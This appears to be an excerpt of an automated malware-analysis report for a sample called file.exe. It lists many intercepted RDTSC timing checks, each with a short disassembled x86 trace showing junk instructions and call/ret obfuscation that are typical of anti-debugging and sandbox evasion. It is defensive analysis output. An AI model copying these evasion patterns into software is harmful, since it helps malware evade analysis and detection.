                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668392 second address: 668396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6684F2 second address: 66850E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8B98B18h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668645 second address: 66864B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6686AB second address: 6686C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F46B8B98B0Dh 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6686C7 second address: 6686FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F46B8DCA198h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 jp 00007F46B8DCA196h 0x0000002b pop ebx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668E2F second address: 668E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668E34 second address: 668E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8DCA1A6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668FC2 second address: 668FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668FC6 second address: 668FCC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669181 second address: 669185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66924B second address: 6692B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F46B8DCA1A2h 0x00000011 mov cl, 79h 0x00000013 pop edi 0x00000014 lea eax, dword ptr [ebp+12479BE8h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F46B8DCA198h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 movzx edx, si 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a js 00007F46B8DCA198h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6692B2 second address: 6692B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6692B7 second address: 669341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F46B8DCA1B5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F46B8DCA198h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 lea eax, dword ptr [ebp+12479BA4h] 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F46B8DCA198h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+122D382Eh] 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 ja 00007F46B8DCA196h 0x00000059 pop ecx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669341 second address: 669347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 669347 second address: 651DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F46B8DCA19Eh 0x0000000f push edx 0x00000010 jno 00007F46B8DCA196h 0x00000016 pop edx 0x00000017 nop 0x00000018 mov edx, 400A9CA7h 0x0000001d call dword ptr [ebp+122D352Bh] 0x00000023 jnp 00007F46B8DCA1CFh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F46B8DCA19Ah 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD5E8 second address: 6AD5EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD77A second address: 6AD77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD77E second address: 6AD784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD784 second address: 6AD7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8DCA1A6h 0x00000008 jmp 00007F46B8DCA1A9h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F46B8DCA196h 0x00000016 jmp 00007F46B8DCA19Ah 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD7C9 second address: 6AD7DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jg 00007F46B8B98B06h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD7DD second address: 6AD7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8DCA1A0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD7F3 second address: 6AD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD7F7 second address: 6AD7FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADC15 second address: 6ADC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADC1B second address: 6ADC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADC1F second address: 6ADC29 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADC29 second address: 6ADC30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADC30 second address: 6ADC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 ja 00007F46B8B98B06h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F46B8B98B19h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B59 second address: 622B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622B5D second address: 622B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B022C second address: 6B0251 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F46B8DCA196h 0x00000008 jc 00007F46B8DCA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F46B8DCA19Eh 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edi 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1B4E second address: 6B1BA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8B98B12h 0x00000007 jmp 00007F46B8B98B18h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F46B8B98B0Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F46B8B98B15h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1BA2 second address: 6B1BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1BA6 second address: 6B1BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4384 second address: 6B438A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B438A second address: 6B438E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B438E second address: 6B439B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9670 second address: 6B9686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 js 00007F46B8B98B0Ch 0x0000000d jng 00007F46B8B98B06h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D28 second address: 6B8D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F46B8DCA19Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D3E second address: 6B8D44 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D44 second address: 6B8D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8D4A second address: 6B8D76 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F46B8B98B0Dh 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push edi 0x00000013 jl 00007F46B8B98B06h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e jp 00007F46B8B98B06h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8EE6 second address: 6B8EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8EF1 second address: 6B8F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B12h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F07 second address: 6B8F13 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F46B8DCA196h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F13 second address: 6B8F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F46B8B98B10h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F2F second address: 6B8F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8F35 second address: 6B8F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9219 second address: 6B921F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B921F second address: 6B9223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC3A second address: 6BEC3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC3F second address: 6BEC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F46B8B98B17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC5C second address: 6BEC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD5F3 second address: 6BD5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD5F7 second address: 6BD61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F46B8DCA1A4h 0x00000009 jmp 00007F46B8DCA19Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD79D second address: 6BD7A7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F46B8B98B06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BD935 second address: 6BD945 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F46B8DCA196h 0x00000008 ja 00007F46B8DCA196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDAF7 second address: 6BDAFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDD35 second address: 6BDD39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDD39 second address: 6BDD42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDD42 second address: 6BDD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007F46B8DCA196h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668B9A second address: 668B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668B9F second address: 668BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 668BA5 second address: 668C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F46B8B98B0Bh 0x0000000e ja 00007F46B8B98B0Ch 0x00000014 popad 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F46B8B98B08h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D39D6h] 0x00000036 xor dx, 3BAEh 0x0000003b mov ebx, dword ptr [ebp+12479BE3h] 0x00000041 and edx, dword ptr [ebp+122D30A8h] 0x00000047 add eax, ebx 0x00000049 push 00000000h 0x0000004b push edx 0x0000004c call 00007F46B8B98B08h 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], edx 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc edx 0x0000005f push edx 0x00000060 ret 0x00000061 pop edx 0x00000062 ret 0x00000063 pushad 0x00000064 mov dword ptr [ebp+122D2F27h], eax 0x0000006a popad 0x0000006b push eax 0x0000006c push esi 0x0000006d jc 00007F46B8B98B0Ch 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEBF second address: 6BDEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEC5 second address: 6BDECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDECF second address: 6BDED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDED4 second address: 6BDED9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDED9 second address: 6BDEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEE6 second address: 6BDEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDEEA second address: 6BDEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE982 second address: 6BE986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1110 second address: 6C1139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F46B8DCA19Fh 0x0000000c jmp 00007F46B8DCA1A3h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1139 second address: 6C115F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007F46B8B98B17h 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C115F second address: 6C1165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1750 second address: 6C1756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1756 second address: 6C175B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C175B second address: 6C1767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F46B8B98B06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA27B second address: 6CA28A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F46B8DCA19Ah 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C85FD second address: 6C8603 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88D9 second address: 6C88DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88DF second address: 6C88E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88E5 second address: 6C88EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C88EB second address: 6C8901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F46B8B98B0Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8901 second address: 6C8907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BBA second address: 6C8BDA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F46B8B98B06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F46B8B98B16h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BDA second address: 6C8BE9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F46B8DCA19Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8BE9 second address: 6C8BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 js 00007F46B8B98B06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9181 second address: 6C9185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C943F second address: 6C9448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9448 second address: 6C9452 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F46B8DCA196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9452 second address: 6C945B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C945B second address: 6C94A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F46B8DCA196h 0x0000000a jo 00007F46B8DCA196h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F46B8DCA19Fh 0x00000018 popad 0x00000019 pushad 0x0000001a push esi 0x0000001b jns 00007F46B8DCA196h 0x00000021 pop esi 0x00000022 pushad 0x00000023 jmp 00007F46B8DCA1A7h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
